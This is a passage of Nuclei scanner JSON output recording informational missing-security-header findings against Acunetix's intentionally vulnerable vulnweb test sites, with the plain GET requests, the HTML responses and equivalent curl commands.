'http://testhtml5.vulnweb.com/static/css'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testaspnet.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testaspnet.vulnweb.com\",\"matched-at\":\"http://testaspnet.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testaspnet.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 14069\\r\\nCache-Control: private\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASP.NET_SessionId=vmit32btaeasjnawkbexxh55; path=/; HttpOnly\\r\\nX-Aspnet-Version: 2.0.50727\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.0 Transitional//EN\\\" \\u003e\\r\\n\\u003cHTML\\u003e\\r\\n\\t\\u003cHEAD\\u003e\\r\\n\\t\\t\\u003ctitle\\u003eacublog news\\u003c/title\\u003e\\r\\n\\t\\t\\u003cMETA http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=windows-1252\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"Microsoft Visual Studio .NET 7.1\\\" name=\\\"GENERATOR\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"C#\\\" name=\\\"CODE_LANGUAGE\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"JavaScript\\\" name=\\\"vs_defaultClientScript\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"http://schemas.microsoft.com/intellisense/ie5\\\" name=\\\"vs_targetSchema\\\"\\u003e\\r\\n\\t\\t\\u003cLINK href=\\\"styles.css\\\" type=\\\"text/css\\\" rel=\\\"stylesheet\\\"\\u003e\\r\\n\\t\\u003c/HEAD\\u003e\\r\\n\\t\\u003cbody\\u003e\\r\\n\\t\\t\\u003cform name=\\\"Form1\\\" method=\\\"post\\\" action=\\\"default.aspx\\\" id=\\\"Form1\\\"\\u003e\\r\\n\\u003cdiv\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTTARGET\\\" id=\\\"__EVENTTARGET\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTARGUMENT\\\" id=\\\"__EVENTARGUMENT\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATE\\\" id=\\\"__VIEWSTATE\\\" value=\\\"/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\r\\n\\u003cscript type=\\\"text/javascript\\\"\\u003e\\r\\n//\\u003c![CDATA[\\r\\nvar theForm = document.forms['Form1'];\\r\\nif (!theForm) {\\r\\n theForm = document.Form1;\\r\\n}\\r\\nfunction __doPostBack(eventTarget, eventArgument) {\\r\\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\\r\\n theForm.__EVENTTARGET.value = eventTarget;\\r\\n theForm.__EVENTARGUMENT.value = eventArgument;\\r\\n theForm.submit();\\r\\n }\\r\\n}\\r\\n//]]\\u003e\\r\\n\\u003c/script\\u003e\\r\\n\\r\\n\\r\\n\\u003cdiv\\u003e\\r\\n\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATEGENERATOR\\\" id=\\\"__VIEWSTATEGENERATOR\\\" value=\\\"CA0B0334\\\" /\\u003e\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTVALIDATION\\\" id=\\\"__EVENTVALIDATION\\\" value=\\\"/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\t\\t\\t\\r\\n\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"COLOR: #e6dccf\\\" bgColor=\\\"#806640\\\" height=\\\"75\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cIMG src=\\\"images/logo_acunetix.gif\\\" align=\\\"absMiddle\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf\\\" align=\\\"right\\\" bgColor=\\\"#806640\\\"\\r\\n\\t\\t\\theight=\\\"75\\\"\\u003eTest Website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\u003cTABLE id=\\\"Table2\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD class=\\\"MenuBar\\\" style=\\\"BORDER-LEFT: #806040 1px solid\\\"\\u003e\\u003cA class=\\\"menu\\\" title=\\\"About\\\" href=\\\"about.aspx\\\"\\u003eabout\\u003c/A\\u003e\\r\\n\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Latest news\\\" href=\\\"default.aspx\\\"\\u003enews\\u003c/A\\u003e \\u003ca href=\\\"login.aspx\\\" id=\\\"Mainmenu2_lnkLog\\\" class=\\\"menu\\\" name=\\\"lnkLog\\\"\\u003elogin\\u003c/a\\u003e \\u003ca href=\\\"Signup.aspx\\\" id=\\\"Mainmenu2_lnkSignup\\\" class=\\\"menu\\\" name=\\\"lnkSignup\\\"\\u003e\\r\\n\\t\\t\\t\\tsignup\\u003c/a\\u003e \\u003cA class=\\\"menu\\\" title=\\\"Network scanner\\\" href=\\\"https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/\\\"\\u003enetwork scanner\\u003c/A\\u003e\\r\\n\\t\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Network vuln help\\\" href=\\\"https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/\\\"\\u003enetwork vuln help\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\u003ctd class=\\\"MenuBar\\\" align=\\\"right\\\" width=\\\"50px\\\"\\u003e\\r\\n\\t\\t\\t\\u003cA href=\\\"rssFeed.aspx\\\"\\u003e\\u003cIMG src=\\\"images/rss.gif\\\" border=\\\"0\\\"\\u003e\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/td\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\r\\n\\t\\t\\t\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"10\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD id=\\\"tdPageData\\\" valign=\\\"top\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 5/16/2019 12:32:30 PM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=0\\\" class=\\\"NewsOperation\\\"\\u003e(37) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=0\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Vulnerability Scanner Now With Network Security Scans\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003eSeamless OpenVAS integration now also available on Windows and Linux\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:37:35 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=3\\\" class=\\\"NewsOperation\\\"\\u003e(37) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=3\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Web Vulnerability Scanner beta released!\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:35:22 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=2\\\" class=\\\"NewsOperation\\\"\\u003e(41) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=2\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eWeb attacks - can your web applications withstand the force?\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.\\u003c/DIV\\u003e\\u003c/TD\\u003e\\r\\n\\r\\n\\t\\t\\t\\t\\t\\u003cTD vAlign=\\\"top\\\" width=\\\"200\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\t\\u003ctable id=\\\"RightPanel1_Calendar\\\" class=\\\"Calendar\\\" cellspacing=\\\"0\\\" cellpadding=\\\"1\\\" title=\\\"Calendar\\\" border=\\\"0\\\" style=\\\"background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\u003ctr\\u003e\\u003ctd colspan=\\\"7\\\" style=\\\"background-color:#E6B873;\\\"\\u003e\\u003ctable class=\\\"Calendar\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\t\\u003ctr\\u003e\\u003ctd style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9040')\\\" style=\\\"color:Black\\\" title=\\\"Go to the previous month\\\"\\u003e\\u0026lt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:70%;\\\"\\u003eNovember 2024\\u003c/td\\u003e\\u003ctd align=\\\"right\\\" style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9101')\\\" style=\\\"color:Black\\\" title=\\\"Go to the next month\\\"\\u003e\\u0026gt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Sunday\\\" scope=\\\"col\\\"\\u003eSun\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Monday\\\" scope=\\\"col\\\"\\u003eMon\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Tuesday\\\" scope=\\\"col\\\"\\u003eTue\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Wednesday\\\" scope=\\\"col\\\"\\u003eWed\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Thursday\\\" scope=\\\"col\\\"\\u003eThu\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Friday\\\" scope=\\\"col\\\"\\u003eFri\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Saturday\\\" scope=\\\"col\\\"\\u003eSat\\u003c/th\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9066')\\\" style=\\\"color:Black\\\" title=\\\"October 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9067')\\\" style=\\\"color:Black\\\" title=\\\"October 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9068')\\\" style=\\\"color:Black\\\" title=\\\"October 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9069')\\\" style=\\\"color:Black\\\" title=\\\"October 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9070')\\\" style=\\\"color:Black\\\" title=\\\"October 31\\\"\\u003e31\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9071')\\\" style=\\\"color:Black\\\" title=\\\"November 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9072')\\\" style=\\\"color:Black\\\" title=\\\"November 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9073')\\\" style=\\\"color:Black\\\" title=\\\"November 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9074')\\\" style=\\\"color:Black\\\" title=\\\"November 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9075')\\\" style=\\\"color:Black\\\" title=\\\"November 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9076')\\\" style=\\\"color:Black\\\" title=\\\"November 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9077')\\\" style=\\\"color:Black\\\" title=\\\"November 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9078')\\\" style=\\\"color:Black\\\" title=\\\"November 08\\\"\\u003e8\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9079')\\\" style=\\\"color:Black\\\" title=\\\"November 09\\\"\\u003e9\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9080')\\\" style=\\\"color:Black\\\" title=\\\"November 10\\\"\\u003e10\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9081')\\\" style=\\\"color:Black\\\" title=\\\"November 11\\\"\\u003e11\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9082')\\\" style=\\\"color:Black\\\" title=\\\"November 12\\\"\\u003e12\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"border-color:#806640;width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9083')\\\" style=\\\"color:Black\\\" title=\\\"November 13\\\"\\u003e13\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9084')\\\" style=\\\"color:Black\\\" title=\\\"November 14\\\"\\u003e14\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9085')\\\" style=\\\"color:Black\\\" title=\\\"November 15\\\"\\u003e15\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9086')\\\" style=\\\"color:Black\\\" title=\\\"November 16\\\"\\u003e16\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9087')\\\" style=\\\"color:Black\\\" title=\\\"November 17\\\"\\u003e17\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9088')\\\" style=\\\"color:Black\\\" title=\\\"November 18\\\"\\u003e18\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9089')\\\" style=\\\"color:Black\\\" title=\\\"November 19\\\"\\u003e19\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9090')\\\" style=\\\"color:Black\\\" title=\\\"November 20\\\"\\u003e20\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9091')\\\" style=\\\"color:Black\\\" title=\\\"November 21\\\"\\u003e21\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9092')\\\" style=\\\"color:Black\\\" title=\\\"November 22\\\"\\u003e22\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9093')\\\" style=\\\"color:Black\\\" title=\\\"November 23\\\"\\u003e23\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9094')\\\" style=\\\"color:Black\\\" title=\\\"November 24\\\"\\u003e24\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9095')\\\" style=\\\"color:Black\\\" title=\\\"November 25\\\"\\u003e25\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9096')\\\" style=\\\"color:Black\\\" title=\\\"November 26\\\"\\u003e26\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9097')\\\" style=\\\"color:Black\\\" title=\\\"November 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9098')\\\" style=\\\"color:Black\\\" title=\\\"November 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9099')\\\" style=\\\"color:Black\\\" title=\\\"November 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9100')\\\" style=\\\"color:Black\\\" title=\\\"November 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9101')\\\" style=\\\"color:Black\\\" title=\\\"December 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9102')\\\" style=\\\"color:Black\\\" title=\\\"December 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9103')\\\" style=\\\"color:Black\\\" title=\\\"December 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9104')\\\" style=\\\"color:Black\\\" title=\\\"December 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9105')\\\" style=\\\"color:Black\\\" title=\\\"December 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9106')\\\" style=\\\"color:Black\\\" title=\\\"December 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9107')\\\" style=\\\"color:Black\\\" title=\\\"December 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\u003c/table\\u003e\\u003cBR\\u003e\\r\\n\\u003ca href=\\\"rssFeed.aspx\\\"\\u003eGet RSS feed\\u003c/a\\u003e\\r\\n\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD colSpan=\\\"2\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\u003c/TABLE\\u003e\\r\\n\\t\\t\\u003c/form\\u003e\\r\\n\\t\\u003c/body\\u003e\\r\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\t\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.\\u003c/p\\u003e\\r\\n\\t\\u003c/div\\u003e\\r\\n\\u003c/HTML\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:06.135170373Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15' 'http://testaspnet.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/T\",\"path\":\"/T\",\"matched-at\":\"http://testasp.vulnweb.com/T/\",\"request\":\"GET /T HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1\\r\\nConnection: close\\r\\nAccept: 